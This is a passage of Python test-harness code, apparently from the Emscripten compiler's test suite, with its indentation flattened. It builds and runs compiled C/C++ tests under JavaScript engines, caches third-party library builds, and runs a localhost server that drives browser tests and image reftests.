ret.append(f'-s{key}={value}')
return ret
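  # For example (illustrative settings): {'EXIT_RUNTIME': 1,
  # 'EXPORTED_FUNCTIONS': ['_main', '_malloc']} serializes to
  # ['-sEXIT_RUNTIME', '-sEXPORTED_FUNCTIONS=_main,_malloc'].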
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False, ldflags=True):
def is_ldflag(f):
return any(f.startswith(s) for s in ['-sENVIRONMENT=', '--pre-js=', '--post-js='])
args = self.serialize_settings() + self.emcc_args
if ldflags:
args += self.ldflags
else:
args = [a for a in args if not is_ldflag(a)]
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
    # use --quiet once it's available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
inputfile = os.path.abspath(filename)
# For some reason es-check requires unix paths, even on windows
if WINDOWS:
inputfile = inputfile.replace('\\', '/')
try:
# es-check prints the details of the errors to stdout, but it also prints
# stuff in the case there are no errors:
# ES-Check: there were no ES version matching errors!
# pipe stdout and stderr so that we can choose if/when to print this
# output and avoid spamming stdout when tests are successful.
shared.run_process(es_check + ['es5', inputfile], stdout=PIPE, stderr=STDOUT, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stdout)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False, js_outfile=True, emcc_args=[], output_basename=None):
suffix = '.js' if js_outfile else '.wasm'
compiler = [compiler_for(filename, force_c)]
if compiler[0] == EMCC:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# For historical reasons emcc compiles and links as C++ by default.
# However we want to run our tests in a more strict manner. We can
# remove this if the issue above is ever fixed.
compiler.append('-sNO_DEFAULT_TO_CXX')
if force_c:
compiler.append('-xc')
if output_basename:
output = output_basename + suffix
else:
basename = os.path.basename(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + emcc_args + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + str(include) for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and self.uses_memory_init_file():
src = read_file(output)
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
js = read_file(javascript_file)
blob = "".join(js.splitlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([WASM_DIS, wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def measure_wasm_code_lines(self, wasm):
wat_lines = self.get_wasm_text(wasm).splitlines()
non_data_lines = [line for line in wat_lines if '(data ' not in line]
return len(non_data_lines)
def run_js(self, filename, engine=None, args=[],
output_nicerizer=None,
assert_returncode=0,
interleaved_output=True):
# use files, as PIPE can get too full and hang us
stdout_file = self.in_dir('stdout')
stderr_file = None
if interleaved_output:
stderr = STDOUT
else:
stderr_file = self.in_dir('stderr')
stderr = open(stderr_file, 'w')
error = None
timeout_error = None
if not engine:
engine = self.js_engines[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout_file, 'w'),
stderr=stderr,
assert_returncode=assert_returncode)
except subprocess.TimeoutExpired as e:
timeout_error = e
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
ret = read_file(stdout_file)
if not interleaved_output:
ret += read_file(stderr_file)
if output_nicerizer:
ret = output_nicerizer(ret)
if error or timeout_error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(read_file(stdout_file), end='')
print('-- end program output --')
if not interleaved_output:
print('-- begin program stderr --')
print(read_file(stderr_file), end='')
print('-- end program stderr --')
if timeout_error:
raise timeout_error
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = f'Expected file not found: {filename}'
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
  # Tests that the given two multiline text contents are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with --verbose.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertFileContents(self, filename, contents):
if EMTEST_VERBOSE:
print(f'Comparing results contents of file: {filename}')
contents = contents.replace('\r', '')
if EMTEST_REBASELINE:
with open(filename, 'w') as f:
f.write(contents)
return
if not os.path.exists(filename):
self.fail('Test expectation file not found: ' + filename + '.\n' +
'Run with --rebaseline to generate.')
expected_content = read_file(filename)
message = "Run with --rebaseline to automatically update expectations"
self.assertTextDataIdentical(expected_content, contents, message,
filename, filename + '.new')
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s'" % (limit_size(value), limit_size(string)))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(read_binary(file1),
read_binary(file2))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init=None, cache_name_extra='', native=False):
if env_init is None:
env_init = {}
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
# get_library() is used to compile libraries, and not link executables,
# so we don't want to pass linker flags here (emscripten warns if you
# try to pass linker settings when compiling).
emcc_args = self.get_emcc_args(ldflags=False)
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
write_binary(bc_file, contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
cflags = ' '.join(emcc_args)
env_init.setdefault('CFLAGS', cflags)
env_init.setdefault('CXXFLAGS', cflags)
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native)
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
    # In the long run it would be nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
print(e.stdout)
print(e.stderr)
self.fail(f'subprocess exited with non-zero return code({e.returncode}): `{shared.shlex_join(cmd)}`')
def emcc(self, filename, args=[], output_filename=None, **kwargs):
cmd = [compiler_for(filename), filename] + self.get_emcc_args(ldflags='-c' not in args) + args
if output_filename:
cmd += ['-o', output_filename]
self.run_process(cmd, **kwargs)
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
  # exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
  # when run under a browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc() {
afunc("b");
}
''')
create_file('libc.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-sSIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.c', ['liba' + so])
ccshared('libc.c', ['liba' + so])
self.set_setting('MAIN_MODULE')
extra_args = ['-L.', 'libb' + so, 'libc' + so]
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n', emcc_args=extra_args)
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc_ptr)(), (*cfunc_ptr)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc_ptr = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc_ptr != NULL);
cfunc_ptr = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc_ptr != NULL);
bfunc_ptr();
cfunc_ptr();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self):
for engine in self.js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in self.js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output=None, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
write_file(filename, src)
return self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
return self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
return self._build_and_run(filename, read_file(expected_output_filename), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
out_suffix = kwargs.pop('out_suffix', '')
outfile = shared.unsuffixed(srcfile) + out_suffix + '.out'
expected = read_file(outfile)
return self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False, emcc_args=[],
interleaved_output=True,
regex=False,
output_basename=None):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
js_file = self.build(filename, libraries=libraries, includes=includes,
force_c=force_c, emcc_args=emcc_args,
output_basename=output_basename)
self.assertExists(js_file)
engines = self.filtered_js_engines()
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.replace_suffix(js_file, '.wasm.c')
executable = shared.replace_suffix(js_file, '.exe')
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode,
interleaved_output=interleaved_output)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all or len(expected_output) == 1:
for o in expected_output:
if regex:
self.assertTrue(re.search(o, js_output), 'Expected regex "%s" to match on:\n%s' % (o, js_output))
else:
self.assertContained(o, js_output)
else:
if regex:
match_any = any(re.search(o, js_output) for o in expected_output)
self.assertTrue(match_any, 'Expected at least one of "%s" to match on:\n%s' % (expected_output, js_output))
else:
self.assertContained(expected_output, js_output)
if assert_returncode == 0 and check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
return js_output
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party/freetype/include'),
'-I' + test_file('third_party/poppler/include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self, cmake):
assert cmake or not WINDOWS, 'on windows, get_zlib_library only supports cmake'
old_args = self.emcc_args.copy()
# inflate.c does -1L << 16
self.emcc_args.append('-Wno-shift-negative-value')
# adler32.c uses K&R style function declarations
self.emcc_args.append('-Wno-deprecated-non-prototype')
# Work around configure-script error. TODO: remove when
# https://github.com/emscripten-core/emscripten/issues/16908 is fixed
self.emcc_args.append('-Wno-pointer-sign')
if cmake:
rtn = self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.', '--'],
make_args=[])
else:
rtn = self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
self.emcc_args = old_args
return rtn
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(read_binary(test_file('browser_harness.html')))
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT macros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.also_wasm2js = int(os.getenv('EMTEST_BROWSER_ALSO_WASM2JS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
reporting = read_file(test_file('browser_reporting.js'))
write_file('reftest.js', '''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
